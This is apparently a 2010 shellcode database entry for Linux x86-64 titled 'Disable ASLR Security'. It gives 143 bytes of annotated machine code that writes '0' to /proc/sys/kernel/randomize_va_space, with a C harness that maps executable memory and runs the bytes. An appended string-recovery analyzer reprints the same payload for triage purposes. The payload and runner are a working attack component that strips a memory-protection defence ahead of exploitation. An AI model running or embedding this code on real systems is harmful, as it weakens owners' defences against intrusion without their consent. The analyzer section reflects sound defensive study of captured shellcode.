# Title : Linux/x86-64 - Disable ASLR Security - 143 bytes
# Published : 2010-06-17
# Author : Jonathan Salwan
/*
Title: Linux/x86-64 - Disable ASLR Security - 143 bytes
Date: 2010-06-17
Tested: Archlinux x86_64 k2.6.33
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/shell_storm
! Database of shellcodes http://www.shell-storm.org/shellcode/
Description:
============
Address space layout randomization (ASLR) is a computer security technique
which involves randomly arranging the positions of key data areas, usually
including the base of the executable and position of libraries, heap, and
stack, in a process's address space.
This shellcode disables ASLR by writing "0" to /proc/sys/kernel/randomize_va_space.
*/
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

const char *SC =
/* open("/proc/sys/kernel/randomize_va_space", O_WRONLY|O_CREAT|O_APPEND, 0644) */
"\x48\x31\xd2"                             // xor %rdx,%rdx
"\x48\xbb\xff\xff\xff\xff\xff\x61\x63\x65" // mov $0x656361ffffffffff,%rbx
"\x48\xc1\xeb\x28"                         // shr $0x28,%rbx  ("ace\0": filler shifted out)
"\x53"                                     // push %rbx
"\x48\xbb\x7a\x65\x5f\x76\x61\x5f\x73\x70" // mov $0x70735f61765f657a,%rbx ("ze_va_sp")
"\x53"                                     // push %rbx
"\x48\xbb\x2f\x72\x61\x6e\x64\x6f\x6d\x69" // mov $0x696d6f646e61722f,%rbx ("/randomi")
"\x53"                                     // push %rbx
"\x48\xbb\x73\x2f\x6b\x65\x72\x6e\x65\x6c" // mov $0x6c656e72656b2f73,%rbx ("s/kernel")
"\x53"                                     // push %rbx
"\x48\xbb\x2f\x70\x72\x6f\x63\x2f\x73\x79" // mov $0x79732f636f72702f,%rbx ("/proc/sy")
"\x53"                                     // push %rbx
"\x48\x89\xe7"                             // mov %rsp,%rdi   (path now on the stack)
"\x66\xbe\x41\x04"                         // mov $0x441,%si  (upper bits of %rsi are not cleared)
"\x66\xba\xa4\x01"                         // mov $0x1a4,%dx  (0644)
"\x48\x31\xc0"                             // xor %rax,%rax
"\xb0\x02"                                 // mov $0x2,%al    (SYS_open)
"\x0f\x05"                                 // syscall
/* write(3, "0\n", 2) */
"\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03" // mov $0x3ffffffffffffff,%rdi
"\x48\xc1\xef\x38"                         // shr $0x38,%rdi  (%rdi = 3, the fd just opened)
"\x48\xbb\xff\xff\xff\xff\xff\xff\x30\x0a" // mov $0xa30ffffffffffff,%rbx
"\x48\xc1\xeb\x30"                         // shr $0x30,%rbx  ("0\n")
"\x53"                                     // push %rbx
"\x48\x89\xe6"                             // mov %rsp,%rsi
"\x48\xba\xff\xff\xff\xff\xff\xff\xff\x02" // mov $0x2ffffffffffffff,%rdx
"\x48\xc1\xea\x38"                         // shr $0x38,%rdx  (%rdx = 2)
"\x48\x31\xc0"                             // xor %rax,%rax
"\xb0\x01"                                 // mov $0x1,%al    (SYS_write)
"\x0f\x05"                                 // syscall
/* _exit(0) */
"\x48\x31\xff"                             // xor %rdi,%rdi
"\x48\x31\xc0"                             // xor %rax,%rax
"\xb0\x3c"                                 // mov $0x3c,%al   (SYS_exit)
"\x0f\x05";                                // syscall

int main(void)
{
    size_t len = strlen(SC);
    /* SC lives in .rodata, which is not executable on current systems, so copy
       it into an anonymous RWX mapping before jumping to it. */
    void *buf = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    memcpy(buf, SC, len);
    fprintf(stdout, "Length: %zu\n", len);
    (*(void (*)(void)) buf)();
    return 0;
}
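Recovering the strings a payload like this assembles on the stack is a routine step when triaging captured shellcode. The analyzer below is an added example, not part of the original listing: it scans the bytes for the mov-imm64 / shr / push idiom used above and rebuilds each string, closing it when %rsp is handed to a syscall argument register. SC_BYTES is the 143-byte payload from the listing; the function and type names are the example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define MAX_STRLEN 64
typedef struct { int count; char s[8][MAX_STRLEN]; } stack_strings;
/* The 143 bytes of SC from the listing above, comments stripped (x86-64, little-endian). */
static const unsigned char SC_BYTES[] =
    "\x48\x31\xd2\x48\xbb\xff\xff\xff\xff\xff\x61\x63\x65\x48\xc1\xeb\x28\x53\x48\xbb\x7a\x65\x5f\x76"
    "\x61\x5f\x73\x70\x53\x48\xbb\x2f\x72\x61\x6e\x64\x6f\x6d\x69\x53\x48\xbb\x73\x2f\x6b\x65\x72\x6e"
    "\x65\x6c\x53\x48\xbb\x2f\x70\x72\x6f\x63\x2f\x73\x79\x53\x48\x89\xe7\x66\xbe\x41\x04\x66\xba\xa4"
    "\x01\x48\x31\xc0\xb0\x02\x0f\x05\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03\x48\xc1\xef\x38\x48\xbb"
    "\xff\xff\xff\xff\xff\xff\x30\x0a\x48\xc1\xeb\x30\x53\x48\x89\xe6\x48\xba\xff\xff\xff\xff\xff\xff"
    "\xff\x02\x48\xc1\xea\x38\x48\x31\xc0\xb0\x01\x0f\x05\x48\x31\xff\x48\x31\xc0\xb0\x3c\x0f\x05";
/* Recover strings the idiom above builds on the stack: mov $imm64,%rbx (48 bb), optional
 * shr $n,%rbx (48 c1 eb n) to drop the 0xff filler and restore the terminating NUL, push %rbx
 * (53). Pushes grow downward, so chunks are prepended; mov %rsp,%rdi|%rsi (48 89 e7|e6) closes one. */
int recover_stack_strings(const unsigned char *c, size_t len, stack_strings *r)
{
    char cur[MAX_STRLEN] = "", chunk[9] = ""; size_t i = 0, curlen = 0, n; uint64_t imm;
    r->count = 0;
    while (i < len) {
        if (i + 10 <= len && c[i] == 0x48 && c[i + 1] == 0xbb) {
            for (imm = 0, n = 0; n < 8; n++) imm |= (uint64_t)c[i + 2 + n] << (8 * n);
            i += 10;
            if (i + 4 <= len && c[i] == 0x48 && c[i + 1] == 0xc1 && c[i + 2] == 0xeb)
                imm >>= c[i + 3], i += 4;                 /* shift the filler bytes out */
            if (i < len && c[i] == 0x53) {                /* push %rbx */
                for (n = 0; n < 8; n++) chunk[n] = (char)(imm >> (8 * n));
                n = strlen(chunk);                        /* the shifted-in NUL ends the chunk */
                if (curlen + n < MAX_STRLEN) {            /* prepend: this push sits lower */
                    memmove(cur + n, cur, curlen + 1);
                    memcpy(cur, chunk, n);
                    curlen += n;
                }
                i++;
            }
        } else if (curlen && i + 3 <= len && c[i] == 0x48 && c[i + 1] == 0x89 && (c[i + 2] | 1) == 0xe7) {
            if (r->count < 8) strcpy(r->s[r->count++], cur);   /* %rsp -> %rdi or %rsi */
            cur[0] = '\0', curlen = 0, i += 3;
        } else i++;
    }
    return r->count;
}
int main(void)
{
    stack_strings r;
    int k, n = recover_stack_strings(SC_BYTES, sizeof(SC_BYTES) - 1, &r);
    for (k = 0; k < n; k++) printf("string %d: \"%s\"\n", k, r.s[k]);
    return 0;
}
```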